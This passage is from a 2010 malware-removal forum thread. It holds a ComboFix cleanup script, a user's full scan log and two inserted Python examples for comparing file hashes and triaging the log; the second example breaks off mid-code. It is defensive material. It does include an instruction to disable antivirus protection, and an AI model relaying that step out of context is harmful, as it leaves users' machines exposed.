scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-372253836-758569873-2018747408-1007\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1604)
c:\windows\system32\Ati2evxx.dll
.
Completion time: 2010-09-23 21:56:57
ComboFix-quarantined-files.txt 2010-09-23 20:56

Pre-Run: 134,338,965,504 bytes free
Post-Run: 134,378,242,048 bytes free

- - End Of File - - 1C508C4AB5F523F2A4368D855EAE3CC7

Re: Help re: Browser Redirects & Raptr Install...

Posted by melboy » September 23rd, 2010, 5:26 pm

Hi

Good - Another CFScript:


COMBOFIX-Script
A word of warning: Please do not run ComboFix on your own. This tool is not a toy and not for everyday use.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    FCopy::
    c:\windows\ServicePackFiles\i386\termsrv.dll | c:\windows\system32\termsrv.dll
    
    Folder::
    c:\documents and settings\HP_Owner\Application Data\Foxix
    c:\documents and settings\HP_Owner\Application Data\Huasq
    c:\documents and settings\HP_Owner\Application Data\Udfyr
    c:\documents and settings\HP_Owner\Application Data\Yfwy
    
    Firefox::
    FF - ProfilePath - c:\documents and settings\HP_Owner\Application Data\Mozilla\Firefox\Profiles\6ncxoaj9.default\
    FF - prefs.js: browser.search.defaulturl - 
    
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

    [Screenshot: CFScript.txt being dragged onto ComboFix.exe]
  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
  • When finished, it shall produce a log for you. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.
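
The Sigcheck section of the first ComboFix log shows why termsrv.dll was sent to VirusTotal and is now being restored with FCopy::: the copy in system32 has MD5 3B58675ED2C6A68C38624681C2548862, while the ServicePackFiles and dllcache copies both have FF3477C03BE7201C294C35F684B3479F at the identical size of 295424 bytes, the signature of a file patched in place rather than replaced. The script below is an added example, not code from the thread or from ComboFix: it reproduces that comparison, treats the majority hash among the backup copies as the known-good build (so the older SP2 build under $NtServicePackUninstall$ does not trip a false alarm), and then does what FCopy:: does, overwriting the live file from a good copy and re-verifying the hash. The XP paths are listed only for reference; demo() runs the same logic on constructed files in a temporary directory, so it works offline on any OS, and the file contents it builds are made up for the demonstration.

```python
"""Sigcheck-style comparison of a Windows system file against its backup copies.

Added example, not from the thread or from ComboFix. Real use is the XP termsrv.dll
case from the log; demo() exercises the same code on constructed files.
"""
import hashlib
import os
import shutil
import tempfile
from collections import Counter

# Paths ComboFix listed under "Sigcheck" (documentation only; not touched by demo()).
XP_TERMSRV_COPIES = {
    'live': r'c:\windows\system32\termsrv.dll',
    'references': [
        r'c:\windows\ServicePackFiles\i386\termsrv.dll',
        r'c:\windows\system32\dllcache\termsrv.dll',
        r'c:\windows\$NtServicePackUninstall$\termsrv.dll',  # SP2 build, legitimately different
    ],
}


def md5_of(path: str) -> str:
    """Upper-case hex MD5, streamed so large binaries are not read into memory at once."""
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(1 << 16), b''):
            h.update(chunk)
    return h.hexdigest().upper()


def check_copies(live: str, references: list) -> tuple:
    """Compare the live file with its reference copies.

    The most common hash among the references is taken as the known-good build, so a
    single stale copy does not outvote the current one. Returns (verdict, hashes) with
    verdict in {'clean', 'patched', 'different-version', 'missing', 'no-reference'}.
    """
    present = [p for p in [live] + references if os.path.isfile(p)]
    hashes = {p: md5_of(p) for p in present}
    if live not in hashes:
        return 'missing', hashes
    votes = Counter(hashes[p] for p in present if p != live)
    if not votes:
        return 'no-reference', hashes
    good_hash = votes.most_common(1)[0][0]
    if hashes[live] == good_hash:
        return 'clean', hashes
    good_path = next(p for p in present if p != live and hashes[p] == good_hash)
    # Same size as the good build but a different hash: bytes overwritten in place,
    # which is what the "Patched Termsrv" / Win32/Patched detections describe.
    if os.path.getsize(live) == os.path.getsize(good_path):
        return 'patched', hashes
    return 'different-version', hashes


def restore_from(good: str, live: str) -> bool:
    """What ComboFix's FCopy:: does: overwrite the live file with the reference copy,
    then confirm the hashes match. On a real system this needs an elevated prompt
    and the service using the file stopped."""
    shutil.copyfile(good, live)
    return md5_of(good) == md5_of(live)


def demo() -> tuple:
    """Constructed scenario mirroring the log: two good copies, one older build,
    and a live copy with four bytes overwritten. Returns (verdict before, verdict after)."""
    root = tempfile.mkdtemp()
    good = b'MZ' + bytes(range(256)) * 4             # stand-in for the SP3 build
    older = b'MZ' + bytes(range(200)) * 4            # stand-in for the SP2 build (other size)
    patched = bytearray(good)
    patched[100:104] = b'\xcc' * 4                   # in-place patch, size unchanged
    layout = {
        'system32/termsrv.dll': bytes(patched),
        'ServicePackFiles/i386/termsrv.dll': good,
        'system32/dllcache/termsrv.dll': good,
        '$NtServicePackUninstall$/termsrv.dll': older,
    }
    paths = {}
    for rel, data in layout.items():
        p = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, 'wb') as f:
            f.write(data)
        paths[rel] = p
    live = paths['system32/termsrv.dll']
    refs = [paths[k] for k in layout if k != 'system32/termsrv.dll']
    before, _ = check_copies(live, refs)
    restore_from(paths['ServicePackFiles/i386/termsrv.dll'], live)
    after, _ = check_copies(live, refs)
    shutil.rmtree(root)
    return before, after


if __name__ == '__main__':
    print('demo verdicts (before, after restore):', demo())
```

On the actual machine the call would be check_copies(XP_TERMSRV_COPIES['live'], XP_TERMSRV_COPIES['references']) from an elevated prompt; a verdict of 'patched' with matching sizes is exactly the state the log's Sigcheck lines describe, and replacing the file is only safe from a copy whose hash agrees with the other references, which is why the FCopy:: source is the ServicePackFiles copy rather than the SP2 uninstall copy.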

Re: Help re: Browser Redirects & Raptr Install...

Posted by ZxcvB123 » September 23rd, 2010, 6:08 pm

ComboFix Results....
_________________________________________

ComboFix 10-09-22.02 - HP_Owner 23/09/2010 22:37:27.3.2 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.3071.2498 [GMT 1:00]
Running from: c:\documents and settings\HP_Owner\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\HP_Owner\Desktop\CFScript2.txt
AV: McAfee Anti-Virus and Anti-Spyware *On-access scanning disabled* (Updated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Firewall *disabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\documents and settings\HP_Owner\Application Data\Foxix
c:\documents and settings\HP_Owner\Application Data\Huasq
c:\documents and settings\HP_Owner\Application Data\Udfyr
c:\documents and settings\HP_Owner\Application Data\Yfwy
c:\documents and settings\HP_Owner\Application Data\Yfwy\dehye.tmp

.
--------------- FCopy ---------------

c:\windows\ServicePackFiles\i386\termsrv.dll --> c:\windows\system32\termsrv.dll
.
((((((((((((((((((((((((( Files Created from 2010-08-23 to 2010-09-23 )))))))))))))))))))))))))))))))
.

2010-09-23 01:38 . 2010-09-23 02:14 -------- d-----w- c:\program files\eMusic Download Manager
2010-09-22 23:09 . 2010-06-14 14:31 744448 -c----w- c:\windows\system32\dllcache\helpsvc.exe
2010-09-22 01:26 . 2010-09-23 20:58 -------- d-----w- C:\_malware logs
2010-09-21 18:04 . 2010-09-21 18:04 -------- d-----w- C:\rsit
2010-09-20 22:43 . 2010-09-21 01:35 -------- d-----w- c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2010-09-20 22:43 . 2010-09-20 22:49 -------- d-----w- c:\program files\Spybot - Search & Destroy
2010-09-20 21:51 . 2010-09-22 22:12 -------- d-----w- c:\windows\system32\MpEngineStore
2010-09-20 16:23 . 2010-09-21 18:06 -------- d-----w- c:\program files\Trend Micro
2010-09-14 01:33 . 2010-09-14 07:47 -------- d-----w- C:\ccleaner
2010-09-13 22:26 . 2010-09-13 22:26 -------- d-----w- c:\documents and settings\Administrator\Application Data\Malwarebytes
2010-09-13 18:24 . 2010-09-13 18:24 -------- d-----w- c:\windows\Options
2010-09-13 01:44 . 2010-09-13 01:44 10134 ----a-r- c:\documents and settings\HP_Owner\Application Data\Microsoft\Installer\{4CCC7F68-A437-4559-A840-F5E010934951}\ARPPRODUCTICON.exe
2010-09-12 20:39 . 2010-09-12 20:39 310208 ----a-w- c:\documents and settings\HP_Owner\Application Data\Azureus\plugins\mlab\ShaperProbeC.exe
2010-09-12 20:35 . 2010-09-12 20:35 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Motive
2010-08-27 21:21 . 2006-08-24 05:44 477696 ----a-r- c:\windows\system32\drivers\ZD1211BU.sys

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-09-23 21:08 . 2007-09-26 22:27 -------- d-----w- c:\program files\Microsoft Silverlight
2010-09-23 21:06 . 2010-05-02 14:57 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\TeraCopy
2010-09-23 02:14 . 2008-11-28 18:35 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\eMusic
2010-09-22 22:13 . 2006-01-20 08:30 5504 ----a-w- c:\windows\system32\drivers\intelide.sys
2010-09-22 20:09 . 2007-09-29 20:11 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Azureus
2010-09-19 20:13 . 2009-07-23 18:08 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\vlc
2010-09-13 18:24 . 2008-09-18 20:59 -------- d-----w- c:\program files\iTunes
2010-09-13 15:15 . 2006-01-20 04:18 -------- d-----w- c:\program files\UTILS
2010-09-12 22:32 . 2010-09-12 22:32 396 ----a-w- c:\program files\.js
2010-08-24 13:57 . 2010-04-15 21:10 9344 ----a-w- c:\windows\system32\drivers\mfeclnk.sys
2010-08-24 13:57 . 2010-04-15 21:09 95600 ----a-w- c:\windows\system32\drivers\mfeapfk.sys
2010-08-24 13:57 . 2010-04-15 21:09 88544 ----a-w- c:\windows\system32\drivers\mfendisk.sys
2010-08-24 13:57 . 2010-04-15 21:09 84264 ----a-w- c:\windows\system32\drivers\mferkdet.sys
2010-08-24 13:57 . 2010-04-15 21:09 84072 ----a-w- c:\windows\system32\drivers\mfetdi2k.sys
2010-08-24 13:57 . 2010-04-15 21:09 52104 ----a-w- c:\windows\system32\drivers\mfebopk.sys
2010-08-24 13:57 . 2010-04-15 21:09 386712 ----a-w- c:\windows\system32\drivers\mfehidk.sys
2010-08-24 13:57 . 2010-04-15 21:09 312904 ----a-w- c:\windows\system32\drivers\mfefirek.sys
2010-08-24 13:57 . 2010-04-15 21:09 152992 ----a-w- c:\windows\system32\drivers\mfeavfk.sys
2010-08-24 13:57 . 2010-04-15 21:09 55840 ----a-w- c:\windows\system32\drivers\cfwids.sys
2010-08-17 13:17 . 2006-01-20 08:32 58880 ----a-w- c:\windows\system32\spoolsv.exe
2010-07-22 15:49 . 2006-01-20 08:32 590848 ----a-w- c:\windows\system32\rpcrt4.dll
2010-07-22 05:57 . 2009-04-15 19:31 5120 ----a-w- c:\windows\system32\xpsp4res.dll
2010-06-30 12:31 . 2006-01-20 08:32 149504 ----a-w- c:\windows\system32\schannel.dll
2010-08-24 13:57 . 2010-04-15 21:10 24376 ----a-w- c:\program files\mozilla firefox\components\Scriptff.dll
2005-01-03 22:30 . 2006-01-20 08:54 0 --sha-w- c:\windows\SMINST\HPCD.SYS
.

((((((((((((((((((((((((((((( SnapShot@2010-09-23_20.52.12 )))))))))))))))))))))))))))))))))))))))))
.
+ 2010-09-23 21:00 . 2010-09-23 21:00 16384 c:\windows\Temp\Perflib_Perfdata_650.dat
+ 2010-06-15 00:54 . 2010-09-23 21:10 49152 c:\windows\Installer\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}\ConfigIcon.dll
- 2010-06-15 00:54 . 2010-06-15 00:54 49152 c:\windows\Installer\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}\ConfigIcon.dll
+ 2010-09-23 21:08 . 2010-09-23 21:08 20303872 c:\windows\Installer\7cb08.msp
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{9DFE2FE9-CF99-4ADF-A28E-9B5ADB8DC74F}]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-07-13 68856]
"SpybotSD TeaTimer"="c:\program files\Spybot - Search & Destroy\TeaTimer.exe" [2009-03-05 2260480]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"hpsysdrv"="c:\windows\system\hpsysdrv.exe" [1998-05-07 52736]
"HPHUPD06"="c:\program files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe" [2004-06-07 49152]
"HPHmon06"="c:\windows\system32\hphmon06.exe" [2004-06-07 659456]
"KBD"="c:\hp\KBD\KBD.EXE" [2003-02-11 61440]
"Recguard"="c:\windows\SMINST\RECGUARD.EXE" [2004-04-14 233472]
"SiS Windows KeyHook"="c:\windows\system32\keyhook.exe" [2004-05-20 249856]
"ATIPTA"="c:\program files\ATI Technologies\ATI Control Panel\atiptaxx.exe" [2004-06-24 339968]
"ATICCC"="c:\program files\ATI Technologies\ATI.ACE\cli.exe" [2005-08-12 45056]
"SoundMan"="SOUNDMAN.EXE" [2004-07-01 73728]
"AlcWzrd"="ALCWZRD.EXE" [2004-07-06 2550272]
"PS2"="c:\windows\system32\ps2.exe" [2002-10-16 81920]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2007-08-31 1037736]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-10-28 141600]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-06-09 976832]
"mcui_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2010-06-30 1193848]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-06-20 35760]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 88363]
"Malwarebytes' Anti-Malware"="c:\program files\Malwarebytes' Anti-Malware\mbamgui.exe" [2010-04-29 437584]

c:\documents and settings\HP_Owner\Start Menu\Programs\Startup\
Adobe Gamma.lnk - c:\program files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2005-3-16 113664]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Acrobat Assistant.lnk - c:\program files\Adobe\Acrobat 6.0\Distillr\acrotray.exe [2003-5-15 217193]
HP Digital Imaging Monitor.lnk - c:\program files\HP\Digital Imaging\bin\hpqtra08.exe [2005-5-12 282624]
HP Image Zone Fast Start.lnk - c:\program files\HP\Digital Imaging\bin\hpqthb08.exe [2005-5-12 73728]
Microsoft Office.lnk - c:\program files\Microsoft Office\Office10\OSA.EXE [2001-2-13 83360]
Windows Home Server.lnk - c:\windows\Installer\{21E49794-7C13-4E84-8659-55BD378267D5}\WHSTrayApp.exe [2010-2-20 604008]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"RequireSignedAppInit_DLLs"=1 (0x1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CloneCDTray]
2006-09-28 19:21 57344 ----a-w- c:\program files\SlySoft\CloneCD\CloneCDTray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Home Theater SchSvr]
2004-07-30 10:34 155648 ----a-w- c:\program files\Common Files\InterVideo\SchSvr\SchSvr.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\mxomssmenu]
2007-09-06 14:53 169264 ----a-w- c:\program files\Maxtor\OneTouch Status\MaxMenuMgr.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2009-09-05 00:54 417792 ----a-w- c:\program files\QuickTime\QTTask.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2009-11-02 22:52 198160 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Windows Media Connect 2]
2006-10-18 20:58 8704 ------w- c:\program files\Windows Media Connect 2\WMCCFG.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WINREMOTE]
2004-07-30 10:41 192512 ----a-w- c:\program files\InterVideo\Common\Bin\WinRemote.exe

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
"c:\\Program Files\\Messenger\\msmsgs.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\SmartFTP Client 2.0\\SmartFTP.exe"=
"c:\\Program Files\\Common Files\\AOL\\Loader\\aolload.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
"c:\\Program Files\\TVersity\\Media Server\\MediaServer.exe"=
"c:\\Program Files\\Common Files\\McAfee\\McSvcHost\\McSvHost.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"3587:TCP"= 3587:TCP:Windows Peer-to-Peer Grouping
"3540:UDP"= 3540:UDP:Peer Name Resolution Protocol (PNRP)
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\IcmpSettings]
"AllowInboundEchoRequest"= 1 (0x1)

R1 mfetdi2k;McAfee Inc. mfetdi2k;c:\windows\system32\drivers\mfetdi2k.sys [15/04/2010 22:09 84072]
R2 HPMSSConnectorSvc;HPMSSConnectorService;c:\program files\Hewlett-Packard\HP MediaSmart Server\MSSConnectorService.exe [05/10/2009 12:09 20992]
R2 Iprip;RIP Listener;c:\windows\System32\svchost.exe -k netsvcs [20/01/2006 09:32 14336]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [04/05/2010 01:17 304464]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [13/01/2010 23:35 88176]
R2 McMPFSvc;McAfee Personal Firewall Service;"c:\program files\Common Files\Mcafee\McSvcHost\McSvHost.exe" /McCoreSvc [15/04/2010 22:09 271480]
R2 McNaiAnn;McAfee VirusScan Announcer;"c:\program files\Common Files\McAfee\McSvcHost\McSvHost.exe" /McCoreSvc [15/04/2010 22:09 271480]
R2 MediaCollectorService;MediaCollectorService;c:\program files\Hewlett-Packard\HP MediaSmart Server\MediaCollectorClient.exe [05/10/2009 12:09 81920]
R2 mfefire;McAfee Firewall Core Service;c:\program files\Common Files\McAfee\SystemCore\mfefire.exe [15/04/2010 22:10 188136]
R2 mfevtp;McAfee Validation Trust Protection Service;c:\program files\Common Files\McAfee\SystemCore\mfevtps.exe [15/04/2010 22:09 141792]
R2 WHSConnector;Windows Home Server Connector Service;c:\program files\Windows Home Server\WHSConnector.exe [07/10/2009 14:48 376680]
R3 cfwids;McAfee Inc. cfwids;c:\windows\system32\drivers\cfwids.sys [15/04/2010 22:09 55840]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [04/05/2010 01:17 20952]
R3 mfefirek;McAfee Inc. mfefirek;c:\windows\system32\drivers\mfefirek.sys [15/04/2010 22:09 312904]
R3 mfendiskmp;mfendiskmp;c:\windows\system32\drivers\mfendisk.sys [15/04/2010 22:09 88544]
R3 PhTVTune;ASUS WDM TV Tuner;c:\windows\system32\drivers\PhTVTune.sys [02/01/2004 03:19 24608]
S2 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [29/01/2010 03:46 135664]
S3 mfendisk;McAfee Core NDIS Intermediate Filter;c:\windows\system32\drivers\mfendisk.sys [15/04/2010 22:09 88544]
S3 mferkdet;McAfee Inc. mferkdet;c:\windows\system32\drivers\mferkdet.sys [15/04/2010 22:09 84264]
S3 xbreader;MaxDrive XBox Driver (xbreader.sys);c:\windows\system32\drivers\xbreader.sys [03/01/2001 00:53 19677]

--- Other Services/Drivers In Memory ---

*Deregistered* - mfeavfk01

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
p2psvc REG_MULTI_SZ p2psvc p2pimsvc p2pgasvc PNRPSvc
getPlusHelper REG_MULTI_SZ getPlusHelper
.
Contents of the 'Scheduled Tasks' folder

2010-09-23 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]

2010-09-23 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-29 02:46]

2010-09-23 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-29 02:46]

2008-09-16 c:\windows\Tasks\Microsoft_Hardware_Launch_IPoint_exe.job
- c:\program files\Microsoft IntelliPoint\ipoint.exe [2007-08-31 19:01]

2010-09-23 c:\windows\Tasks\User_Feed_Synchronization-{BEDA1DC8-9CAF-4902-8B5F-2FB3702C6673}.job
- c:\windows\system32\msfeedssync.exe [2006-10-17 11:58]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.facebook.com/
uDefault_Search_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE= ... pf=desktop
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Settings,ProxyOverride = <local>
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: &Download with &DAP - c:\program files\UTILS\DAP\dapextie.htm
IE: Download &all with DAP - c:\program files\UTILS\DAP\dapextie2.htm
IE: Download All by FlashGet - c:\progra~1\UTILS\FlashGet\jc_all.htm
IE: Download using FlashGet - c:\progra~1\UTILS\FlashGet\jc_link.htm
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office10\EXCEL.EXE/3000
IE: Google Sidewiki... - c:\program files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_89D8574934B26AC4.dll/cmsidewiki.html
Name-Space Handler: ftp\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\UTILS\DAP\dapie.dll
Name-Space Handler: http\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\UTILS\DAP\dapie.dll
FF - ProfilePath - c:\documents and settings\HP_Owner\Application Data\Mozilla\Firefox\Profiles\6ncxoaj9.default\
FF - prefs.js: browser.search.selectedEngine - Google
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-09-23 22:53
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-372253836-758569873-2018747408-1007\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1204)
c:\windows\system32\Ati2evxx.dll
.
Completion time: 2010-09-23 22:58:29
ComboFix-quarantined-files.txt 2010-09-23 21:58
ComboFix2.txt 2010-09-23 20:57

Pre-Run: 133,635,960,832 bytes free
Post-Run: 133,630,386,176 bytes free

- - End Of File - - A8DF8BB5828BF77742D1C4CBAACE6069


*********** THANKS FOR THE CONTINUED HELP ****************

************ FROM ALL YOUR WORK LOOKS LIKE THE MACHINE IS BADLY INFECTED, NO???? *************
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm
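For anyone working through a ComboFix log like the one above, here is an added example (not part of the original thread and not ComboFix's own code) that re-reads a handful of lines copied from that log and flags the points a helper looks at first: a file under system32 rewritten in the last week but created years earlier, an oddly named file sitting directly in Program Files, Security Center monitoring switched off, the Windows Firewall disabled, and globally open ports such as 3389 (RDP). The sample lines are a constructed subset of the log, the scan timestamp is the log's "Completion time", the seven-day window is an assumption, and the finding names are this example's own.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# A constructed subset of lines copied from the ComboFix log above.
SAMPLE_LOG = r"""
2010-09-22 22:13 . 2006-01-20 08:30 5504 ----a-w- c:\windows\system32\drivers\intelide.sys
2010-09-12 22:32 . 2010-09-12 22:32 396 ----a-w- c:\program files\.js
2010-08-24 13:57 . 2010-04-15 21:10 9344 ----a-w- c:\windows\system32\drivers\mfeclnk.sys
2010-09-23 21:08 . 2007-09-26 22:27 -------- d-----w- c:\program files\Microsoft Silverlight
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"3587:TCP"= 3587:TCP:Windows Peer-to-Peer Grouping
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009
"""

# "Completion time" from the log header; the reference point for "recent".
SCAN_TIME = datetime(2010, 9, 23, 22, 58)

# ComboFix file lines: <modified> . <created> <size or dashes> <attrs> <path>
FILE_RE = re.compile(
    r"^(?P<mod>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) \. "
    r"(?P<created>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) "
    r"(?P<size>\d+|-+) (?P<attrs>\S+) (?P<path>.+)$"
)
KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"\s*=\s*(?P<data>.+)$')


@dataclass(frozen=True)
class Finding:
    kind: str    # short tag chosen for this example, not a ComboFix term
    detail: str


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M")


def triage(log_text, scan_time=SCAN_TIME, recent_days=7):
    """Return the findings worth a second look, in log order."""
    findings = []
    current_key = ""
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = FILE_RE.match(line)
        if m:
            if m["attrs"].startswith("d"):
                continue  # directory entry, nothing to hash
            path = m["path"].lower()
            modified, created = _ts(m["mod"]), _ts(m["created"])
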